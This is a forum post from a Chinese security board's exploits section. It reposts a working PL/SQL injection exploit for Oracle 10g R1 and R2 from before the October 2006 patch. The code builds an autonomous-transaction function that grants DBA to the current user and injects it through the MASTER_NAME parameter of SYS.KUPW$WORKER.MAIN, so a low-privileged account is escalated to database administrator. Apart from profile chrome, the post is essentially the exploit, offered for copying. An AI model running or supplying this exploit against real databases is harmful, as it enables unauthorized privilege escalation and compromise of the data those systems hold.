Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-1-25 22:08 只看该作者

Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit

复制内容到剪贴板

代码:

/**

* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006

* Joxean Koret <[email]joxeankoret@yahoo.es[/email]>

* Privileges needed:

*

* - CREATE SESSION

* - CREATE PROCEDURE

*

*/

select *

from user_role_privs

;



CREATE OR REPLACE FUNCTION F1

RETURN NUMBER AUTHID CURRENT_USER

IS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE &#39;GRANT DBA TO TEST&#39;;

COMMIT;

RETURN(1);

END;

/



DECLARE

MASTER_NAME VARCHAR2(200);

MASTER_OWNER VARCHAR2(200);

BEGIN

MASTER_NAME := &#39;&#39;&#39; or &#39; || user || &#39;.f1=1--&#39;;

MASTER_OWNER := &#39;bla&#39;;

SYS.KUPW$WORKER.MAIN(

MASTER_NAME => MASTER_NAME,

MASTER_OWNER => MASTER_OWNER

);

END;

/



select *

from user_role_privs

;

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit